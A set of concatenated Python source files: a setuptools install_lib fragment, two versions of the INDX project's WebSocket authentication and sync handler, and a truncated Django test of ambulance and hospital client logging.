"""Don't add compiled flags to filenames of non-Python files"""
def run(self):
self.build()
outfiles = self.install()
if outfiles is not None:
# always compile, in case we have any extension stubs to deal with
self.byte_compile(outfiles)
def get_exclusions(self):
exclude = {}
nsp = self.distribution.namespace_packages
svem = (nsp and self.get_finalized_command('install')
.single_version_externally_managed)
if svem:
for pkg in nsp:
parts = pkg.split('.')
while parts:
pkgdir = os.path.join(self.install_dir, *parts)
for f in self._gen_exclude_names():
exclude[os.path.join(pkgdir, f)] = 1
parts.pop()
return exclude
@staticmethod
def _gen_exclude_names():
"""
Generate file paths to be excluded for namespace packages (bytecode
cache files).
"""
yield '__init__.py'
yield '__init__.pyc'
yield '__init__.pyo'
if not hasattr(imp, 'get_tag'):
return
base = os.path.join('__pycache__', '__init__.' + imp.get_tag())
yield base + '.pyc'
yield base + '.pyo'
def copy_tree(
self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
):
assert preserve_mode and preserve_times and not preserve_symlinks
exclude = self.get_exclusions()
if not exclude:
return orig.install_lib.copy_tree(self, infile, outfile)
# Exclude namespace package __init__.py* files from the output
from setuptools.archive_util import unpack_directory
from distutils import log
outfiles = []
def pf(src, dst):
if dst in exclude:
log.warn("Skipping installation of %s (namespace package)",
dst)
return False
log.info("copying %s -> %s", src, os.path.dirname(dst))
outfiles.append(dst)
return dst
unpack_directory(infile, outfile, pf)
return outfiles
def get_outputs(self):
outputs = orig.install_lib.get_outputs(self)
exclude = self.get_exclusions()
if exclude:
return [f for f in outputs if f not in exclude]
return outputs
|
# Copyright (C) 2011-2014 University of Southampton
# Copyright (C) 2011-2014 Daniel Alexander Smith
# Copyright (C) 2011-2014 Max Van Kleek
# Copyright (C) 2011-2014 Nigel R. Shadbolt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import json
import cjson
import traceback
import StringIO
from twisted.internet.defer import Deferred
import indx_pg2 as database
from indx.crypto import auth_keys, rsa_sign
import indx.sync
from indx.reactor import IndxRequest
class IndxAsync:
""" Abstracted logic for the INDX aynchronous (i.e. WebSocket) server. """
def __init__(self, send_f, webserver, clientip):
self.send_f = send_f # send messages function reference
self.webserver = webserver
self.clientip = clientip
def receive(self, frame):
""" Send data here when it is received from the real transport. """
try:
def err_cb(failure):
logging.error("WebSocketsHandler receive, err_cb: {0}".format(failure))
data = json.loads(frame)
requestid = data.get("requestid")
if data.get("action") == "diff" and data.get("operation") == "update":
# received after login_keys succeeds and we send the diff/start message
self.remote_observer(data)
return
if data.get("action") == "http":
# a call to an http request, over the websocket (via the reactor mappings)
logging.debug("Async got an http request, data: {0}".format(data))
request = data.get("request")
#session = data.get("sessionid")
session = None
#if session is None:
# return self.send400(requestid, "http", data = {"error": "'sessionid' required in 'http'" })
#session = self.sessionid # TODO enable multiple sessions per websocket
logging.debug("Async got an http request: {0} in session {1}".format(request, session))
def req_cb(response):
logging.debug("ASync sending http response in session: {0}".format(session))
frame = {"respond_to": "http", "response": response.to_json()}
if session is not None:
frame['session'] = session
self.sendJSON(requestid, frame, "http")
indx_request = IndxRequest(
request.get("uri"),
request.get("method"),
request.get("path"),
request.get("params"),
request.get("content"),
session,
req_cb,
self.clientip
)
self.webserver.indx_reactor.incoming(indx_request)
return
elif data.get("action") == "echo":
logging.debug("Async got an echo request: {0}".format(data))
self.sendJSON(requestid, {}, "echo")
return
elif data.get('respond_to') == "login_keys":
# a response to our attempt to re-connect back to the client
logging.debug("Async got a respond to login_keys: {0}".format(data))
# TODO handle errors
self.sendJSON(requestid, {"action": "diff", "operation": "start"}, "login_keys")
return
elif data['action'] == "auth":
def token_cb(token):
try:
if token is None:
self.send401(requestid, "auth")
return
logging.debug("WebSocketsHandler Auth by Token {0} successful.".format(data['token']))
self.tokens[token.id] = token
# also tell the webserver we just got a successful auth from an outside client via websocket
# so it can try to connect back over this websocket.
# self.webserver.
self.send200(requestid, "auth")
return
except Exception as e:
logging.error("WebSocketsHandler frameReceived, token error: {0}".format(e))
self.send401(requestid, "auth")
return
self.tokenkeeper.get(data['token']).addCallbacks(token_cb, err_cb)
# elif data['action'] == "get_session_id":
# self.send200(requestid, "auth", data = {'sessionid': self.sessionid})
elif data['action'] == "login_keys":
if requestid is None:
return self.send400(requestid, "login_keys", data = {"error": "'requestid' required for action 'login_keys'"})
try:
signature, key_hash, algo, method, appid, encpk2 = data['signature'], data['key_hash'], data['algo'], data['method'], data['appid'], data['encpk2']
except Exception as e:
logging.error("ASync login_keys error getting all parameters.")
return self.send400(requestid, "login_keys")
def win(resp):
# authenticated now - state of this isn't saved though, we get a token immediately instead
username, password, boxid = resp
origin = "/ws" # TODO double-check this
# get token, return that
def got_acct(acct):
if acct == False:
return self.send401(requestid, "login_keys")
db_user, db_pass = acct
def token_cb(token):
def store_cb(store):
# success, send token back to user
# first, try to connect back through the websocket
self.tokens[token.id] = token
self.connectBackToClient(key_hash, store).addCallbacks(lambda empty: logging.debug("ASync, success connecting back."), lambda failure: logging.error("ASync, failure connecting back: {0}".format(failure)))
return self.send200(requestid, "login_keys", data = {"token": token.id})
token.get_store().addCallbacks(store_cb, lambda failure: self.send500(requestid, "login_keys"))
self.webserver.tokens.new(username,password,boxid,appid,origin,self.clientip,self.webserver.server_id).addCallbacks(token_cb, lambda failure: self.send500(requestid, "login_keys"))
self.webserver.database.lookup_best_acct(boxid, username, password).addCallbacks(got_acct, lambda conn: self.send401(requestid, "login_keys"))
def fail(empty):
self.send401(requestid, "login_keys")
auth_keys(self.webserver.keystore, signature, key_hash, algo, method, requestid, encpk2).addCallbacks(win, fail)
elif data['action'] == "diff":
# turn on/off diff listening
if data['operation'] == "start":
token = data.get("token")
if token is None:
return self.send400(requestid, "diff", data = {"error": "'token' required for diff start"})
self.listen_diff(requestid, token)
self.send200(requestid, "diff")
return
elif data['operation'] == "stop":
#self.stop_listen()
self.send200(requestid, "diff")
return
else:
self.send400(requestid, "diff")
return
else:
action = data.get("action") # could be None
self.send400(requestid, action)
return
except Exception as e:
logging.error("WebSocketsHandler frameRecevied, error: {0},\n trace: {1}".format(e, traceback.format_exc()))
self.send500(requestid, data.get("action"))
return
def connectBackToClient(self, public_key_hash, store):
""" Try to connect back through this websocket to the other side. """
logging.debug("ASync connectBackToClient, using hash {0}".format(public_key_hash))
# look up IndxSync object by public_key_hash
return_d = Deferred()
# lookup model
def model_cb(resp):
model_id, boxid = resp
all_models = [model_id]
def sync_cb(indxsync):
indxsync.sync_boxes(all_models = all_models, websocket = self).addCallbacks(return_d.callback, return_d.errback)
self.webserver.sync_box(boxid).addCallbacks(sync_cb, return_d.errback)
self.get_model_by_key(public_key_hash, store).addCallbacks(model_cb, return_d.errback)
return return_d
def listen_remote(self, private_key, key_hash, observer, remote_encpk2):
self.remote_observer = observer
keyauth = {"key_hash": key_hash, "private_key": private_key, "encpk2": remote_encpk2}
try:
SSH_MSG_USERAUTH_REQUEST = "50"
method = "publickey"
algo = "SHA512"
key_hash, private_key, encpk2 = keyauth['key_hash'], keyauth['private_key'], keyauth['encpk2']
if not (type(encpk2) == type("") or type(encpk2) == type(u"")):
encpk2 = json.dumps(encpk2)
requestid = "{0}".format(uuid.uuid1())
ordered_signature_text = '{0}\t{1}\t"{2}"\t{3}\t{4}'.format(SSH_MSG_USERAUTH_REQUEST, requestid, method, algo, key_hash)
signature = rsa_sign(private_key, ordered_signature_text)
values = {"action": "login_keys", "signature": signature, "key_hash": key_hash, "algo": algo, "method": method, "appid": "INDX ASync", "encpk2": encpk2}
self.sendJSON(None, values, None)
except Exception as e:
logging.error("ASync: {0}".format(e))
def get_model_by_key(self, public_key_hash, store):
""" Get the ID of a 'link' object, based on the hash of a public key it uses.
Public keys are not reused, so it will only match one.
"""
return_d = Deferred()
query = {"type": indx.sync.NS_ROOT_BOX + "link",
"boxes":
{"key":
{"public-hash": public_key_hash}
}
}
def query_cb(graph):
modelid, boxname = None, None
for obj_id, obj in graph.root_objects().items():
modelid = obj_id
for box in graph.get(obj_id).get("boxes"):
for key in graph.get(box.id).get("key"):
public_hash = graph.get(key.id).getOneValue("public-hash")
if public_hash != public_key_hash: # pick the box that doesn't match the key, i.e. our box
boxname = graph.get(box.id).getOneValue("box")
return_d.callback((modelid, boxname))
return
return_d.errback(Exception("Could not find a model that uses the public key hash: {0}".format(public_key_hash)))
store.query(query, render_json = False, depth = 4).addCallbacks(query_cb, return_d.errback)
return return_d
def connected(self):
""" Called by WebSocketsHandler when the connection is completed through the real transport. """
# TokenKeeper from the webserver. The "webserver" attribtue in site is added in server.py when we create the WebSocketsSite.
self.tokenkeeper = self.webserver.tokens
self.tokens = {} # tokenid -> token object
self.send200(None, "connect", data = {})
def listen_diff(self, requestid, tokenid):
def err_cb(failure):
logging.error("WebSocketsHandler listen_diff, err_cb: {0}".format(failure))
def store_cb(store):
logging.debug("WebSocketsHandler listen_diff, store_cb: {0}".format(store))
def observer_local(diff):
""" Receive an update from the server. """
logging.debug("WebSocketsHandler listen_diff observer notified: {0}".format(diff))
self.sendJSON(requestid, {"action": "diff", "operation": "update", "data": diff}, "diff")
store.listen(observer_local) # no callbacks, nothing to do
token = self.tokens.get(tokenid)
if token is None:
return self.send400(requestid, "diff", data = {"error": "token invalid (it must be authed successfully to this websocket to use it here)"})
token.get_store().addCallbacks(store_cb, err_cb)
def sendJSON(self, requestid, data, respond_to = None):
""" Send data as JSON to the WebSocket. """
logging.debug("ASync send JSON of data: {0}, requestid: {1}".format(data, requestid))
#encoded = cjson.encode(data)
try:
if requestid:
data.update({"requestid": requestid})
if respond_to:
data.update({"respond_to": respond_to})
encoded = json.dumps(data)
self.send_f(encoded)
except Exception as e:
logging.error("Async error sending JSON: {0}".format(e))
def send500(self, requestid, respond_to, data = None):
out = {"success": False, "error": "500 Internal Server Error"}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
def send400(self, requestid, respond_to, data = None):
out = {"success": False, "error": "400 Bad Request"}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
def send401(self, requestid, respond_to, data = None):
out = {"success": False, "error": "401 Unauthorized"}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
def send200(self, requestid, respond_to, data = None):
out = {"success": True}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
Handle errors in listen_diff correctly
# Copyright (C) 2011-2014 University of Southampton
# Copyright (C) 2011-2014 Daniel Alexander Smith
# Copyright (C) 2011-2014 Max Van Kleek
# Copyright (C) 2011-2014 Nigel R. Shadbolt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import json
import cjson
import traceback
import StringIO
from twisted.internet.defer import Deferred
from twisted.python.failure import Failure
import indx_pg2 as database
from indx.crypto import auth_keys, rsa_sign
import indx.sync
from indx.reactor import IndxRequest
class IndxAsync:
""" Abstracted logic for the INDX aynchronous (i.e. WebSocket) server. """
def __init__(self, send_f, webserver, clientip):
self.send_f = send_f # send messages function reference
self.webserver = webserver
self.clientip = clientip
def receive(self, frame):
""" Send data here when it is received from the real transport. """
try:
def err_cb(failure):
logging.error("WebSocketsHandler receive, err_cb: {0}".format(failure))
data = json.loads(frame)
requestid = data.get("requestid")
if data.get("action") == "diff" and data.get("operation") == "update":
# received after login_keys succeeds and we send the diff/start message
self.remote_observer(data)
return
if data.get("action") == "http":
# a call to an http request, over the websocket (via the reactor mappings)
logging.debug("Async got an http request, data: {0}".format(data))
request = data.get("request")
#session = data.get("sessionid")
session = None
#if session is None:
# return self.send400(requestid, "http", data = {"error": "'sessionid' required in 'http'" })
#session = self.sessionid # TODO enable multiple sessions per websocket
logging.debug("Async got an http request: {0} in session {1}".format(request, session))
def req_cb(response):
logging.debug("ASync sending http response in session: {0}".format(session))
frame = {"respond_to": "http", "response": response.to_json()}
if session is not None:
frame['session'] = session
self.sendJSON(requestid, frame, "http")
indx_request = IndxRequest(
request.get("uri"),
request.get("method"),
request.get("path"),
request.get("params"),
request.get("content"),
session,
req_cb,
self.clientip
)
self.webserver.indx_reactor.incoming(indx_request)
return
elif data.get("action") == "echo":
logging.debug("Async got an echo request: {0}".format(data))
self.sendJSON(requestid, {}, "echo")
return
elif data.get('respond_to') == "login_keys":
# a response to our attempt to re-connect back to the client
logging.debug("Async got a respond to login_keys: {0}".format(data))
# TODO handle errors
self.sendJSON(requestid, {"action": "diff", "operation": "start"}, "login_keys")
return
elif data['action'] == "auth":
def token_cb(token):
try:
if token is None:
self.send401(requestid, "auth")
return
logging.debug("WebSocketsHandler Auth by Token {0} successful.".format(data['token']))
self.tokens[token.id] = token
# also tell the webserver we just got a successful auth from an outside client via websocket
# so it can try to connect back over this websocket.
# self.webserver.
self.send200(requestid, "auth")
return
except Exception as e:
logging.error("WebSocketsHandler frameReceived, token error: {0}".format(e))
self.send401(requestid, "auth")
return
self.tokenkeeper.get(data['token']).addCallbacks(token_cb, err_cb)
# elif data['action'] == "get_session_id":
# self.send200(requestid, "auth", data = {'sessionid': self.sessionid})
elif data['action'] == "login_keys":
if requestid is None:
return self.send400(requestid, "login_keys", data = {"error": "'requestid' required for action 'login_keys'"})
try:
signature, key_hash, algo, method, appid, encpk2 = data['signature'], data['key_hash'], data['algo'], data['method'], data['appid'], data['encpk2']
except Exception as e:
logging.error("ASync login_keys error getting all parameters.")
return self.send400(requestid, "login_keys")
def win(resp):
# authenticated now - state of this isn't saved though, we get a token immediately instead
username, password, boxid = resp
origin = "/ws" # TODO double-check this
# get token, return that
def got_acct(acct):
if acct == False:
return self.send401(requestid, "login_keys")
db_user, db_pass = acct
def token_cb(token):
def store_cb(store):
# success, send token back to user
# first, try to connect back through the websocket
self.tokens[token.id] = token
self.connectBackToClient(key_hash, store).addCallbacks(lambda empty: logging.debug("ASync, success connecting back."), lambda failure: logging.error("ASync, failure connecting back: {0}".format(failure)))
return self.send200(requestid, "login_keys", data = {"token": token.id})
token.get_store().addCallbacks(store_cb, lambda failure: self.send500(requestid, "login_keys"))
self.webserver.tokens.new(username,password,boxid,appid,origin,self.clientip,self.webserver.server_id).addCallbacks(token_cb, lambda failure: self.send500(requestid, "login_keys"))
self.webserver.database.lookup_best_acct(boxid, username, password).addCallbacks(got_acct, lambda conn: self.send401(requestid, "login_keys"))
def fail(empty):
self.send401(requestid, "login_keys")
auth_keys(self.webserver.keystore, signature, key_hash, algo, method, requestid, encpk2).addCallbacks(win, fail)
elif data['action'] == "diff":
# turn on/off diff listening
if data['operation'] == "start":
token = data.get("token")
if token is None:
return self.send400(requestid, "diff", data = {"error": "'token' required for diff start"})
def listen_cb(empty):
self.send200(requestid, "diff")
def diff_err_cb(failure):
failure.trap(Exception)
self.send400(requestid, "diff", data = {"error": "{0}".format(failure.value)})
self.listen_diff(requestid, token).addCallbacks(listen_cb, diff_err_cb)
return
elif data['operation'] == "stop":
#self.stop_listen()
self.send200(requestid, "diff")
return
else:
self.send400(requestid, "diff")
return
else:
action = data.get("action") # could be None
self.send400(requestid, action)
return
except Exception as e:
logging.error("WebSocketsHandler frameRecevied, error: {0},\n trace: {1}".format(e, traceback.format_exc()))
self.send500(requestid, data.get("action"))
return
def connectBackToClient(self, public_key_hash, store):
""" Try to connect back through this websocket to the other side. """
logging.debug("ASync connectBackToClient, using hash {0}".format(public_key_hash))
# look up IndxSync object by public_key_hash
return_d = Deferred()
# lookup model
def model_cb(resp):
model_id, boxid = resp
all_models = [model_id]
def sync_cb(indxsync):
indxsync.sync_boxes(all_models = all_models, websocket = self).addCallbacks(return_d.callback, return_d.errback)
self.webserver.sync_box(boxid).addCallbacks(sync_cb, return_d.errback)
self.get_model_by_key(public_key_hash, store).addCallbacks(model_cb, return_d.errback)
return return_d
def listen_remote(self, private_key, key_hash, observer, remote_encpk2):
self.remote_observer = observer
keyauth = {"key_hash": key_hash, "private_key": private_key, "encpk2": remote_encpk2}
try:
SSH_MSG_USERAUTH_REQUEST = "50"
method = "publickey"
algo = "SHA512"
key_hash, private_key, encpk2 = keyauth['key_hash'], keyauth['private_key'], keyauth['encpk2']
if not (type(encpk2) == type("") or type(encpk2) == type(u"")):
encpk2 = json.dumps(encpk2)
requestid = "{0}".format(uuid.uuid1())
ordered_signature_text = '{0}\t{1}\t"{2}"\t{3}\t{4}'.format(SSH_MSG_USERAUTH_REQUEST, requestid, method, algo, key_hash)
signature = rsa_sign(private_key, ordered_signature_text)
values = {"action": "login_keys", "signature": signature, "key_hash": key_hash, "algo": algo, "method": method, "appid": "INDX ASync", "encpk2": encpk2}
self.sendJSON(None, values, None)
except Exception as e:
logging.error("ASync: {0}".format(e))
def get_model_by_key(self, public_key_hash, store):
""" Get the ID of a 'link' object, based on the hash of a public key it uses.
Public keys are not reused, so it will only match one.
"""
return_d = Deferred()
query = {"type": indx.sync.NS_ROOT_BOX + "link",
"boxes":
{"key":
{"public-hash": public_key_hash}
}
}
def query_cb(graph):
modelid, boxname = None, None
for obj_id, obj in graph.root_objects().items():
modelid = obj_id
for box in graph.get(obj_id).get("boxes"):
for key in graph.get(box.id).get("key"):
public_hash = graph.get(key.id).getOneValue("public-hash")
if public_hash != public_key_hash: # pick the box that doesn't match the key, i.e. our box
boxname = graph.get(box.id).getOneValue("box")
return_d.callback((modelid, boxname))
return
return_d.errback(Exception("Could not find a model that uses the public key hash: {0}".format(public_key_hash)))
store.query(query, render_json = False, depth = 4).addCallbacks(query_cb, return_d.errback)
return return_d
def connected(self):
""" Called by WebSocketsHandler when the connection is completed through the real transport. """
# TokenKeeper from the webserver. The "webserver" attribtue in site is added in server.py when we create the WebSocketsSite.
self.tokenkeeper = self.webserver.tokens
self.tokens = {} # tokenid -> token object
self.send200(None, "connect", data = {})
def listen_diff(self, requestid, tokenid):
return_d = Deferred()
def store_cb(store):
logging.debug("WebSocketsHandler listen_diff, store_cb: {0}".format(store))
def observer_local(diff):
""" Receive an update from the server. """
logging.debug("WebSocketsHandler listen_diff observer notified: {0}".format(diff))
self.sendJSON(requestid, {"action": "diff", "operation": "update", "data": diff}, "diff")
store.listen(observer_local) # no callbacks, nothing to do
return_d.callback(True) # much success
token = self.tokens.get(tokenid)
if token is None:
return_d.errback(Failure(Exception("token invalid (it must be authed successfully to this websocket to use it here)")))
return return_d
token.get_store().addCallbacks(store_cb, return_d.errback)
return return_d
def sendJSON(self, requestid, data, respond_to = None):
""" Send data as JSON to the WebSocket. """
logging.debug("ASync send JSON of data: {0}, requestid: {1}".format(data, requestid))
#encoded = cjson.encode(data)
try:
if requestid:
data.update({"requestid": requestid})
if respond_to:
data.update({"respond_to": respond_to})
encoded = json.dumps(data)
self.send_f(encoded)
except Exception as e:
logging.error("Async error sending JSON: {0}".format(e))
def send500(self, requestid, respond_to, data = None):
out = {"success": False, "error": "500 Internal Server Error"}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
def send400(self, requestid, respond_to, data = None):
out = {"success": False, "error": "400 Bad Request"}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
def send401(self, requestid, respond_to, data = None):
out = {"success": False, "error": "401 Unauthorized"}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
def send200(self, requestid, respond_to, data = None):
out = {"success": True}
if data is not None:
out.update(data)
self.sendJSON(requestid, out, respond_to)
|
import json
import logging
from io import BytesIO
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.db import transaction
from django.utils import timezone
from rest_framework.parsers import JSONParser
from django.test import Client as DjangoClient
from ambulance.models import Ambulance
from emstrack.tests.util import date2iso
from hospital.models import Hospital
from login.models import Client, ClientStatus, ClientLog, ClientActivity
from login.serializers import ClientSerializer
from login.tests.setup_data import TestSetup
logger = logging.getLogger(__name__)
class TestClient(TestSetup):
def testAmbulance(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 1)
# go offline
client1.status = ClientStatus.F.name
client1.save()
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 2)
# go online with ambulance
client1.status = ClientStatus.O.name
client1.ambulance = self.a1
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, self.a1)
self.assertEqual(a.client, client1)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AI.name)
self.assertEqual(log.details, self.a1.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 4)
# go offline
client1.status = ClientStatus.F.name
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(a, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.AO.name)
self.assertEqual(log.details, self.a1.identifier)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 6)
# client online
client1.status = ClientStatus.O.name
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 7)
# login ambulance a1
client1.ambulance = self.a1
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, self.a1)
self.assertEqual(a.client, client1)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AI.name)
self.assertEqual(log.details, self.a1.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 9)
# logout ambulance
client1.ambulance = None
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(a, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AO.name)
self.assertEqual(log.details, self.a1.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 11)
# login ambulance a2
client1.ambulance = self.a2
client1.save()
a = Ambulance.objects.get(id=self.a2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, self.a2)
self.assertEqual(a.client, client1)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AI.name)
self.assertEqual(log.details, self.a2.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 13)
# go offline
client1.status = ClientStatus.F.name
client1.save()
a = Ambulance.objects.get(id=self.a2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(a, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.AO.name)
self.assertEqual(log.details, self.a2.identifier)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 15)
def testHospital(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 1)
# go offline
client1.status = ClientStatus.F.name
client1.save()
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 2)
# go online with hospital
client1.status = ClientStatus.O.name
client1.hospital = self.h1
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h1)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 4)
# go offline
client1.status = ClientStatus.F.name
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h1.name)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 6)
# client online
client1.status = ClientStatus.O.name
client1.save()
h = Ambulance.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
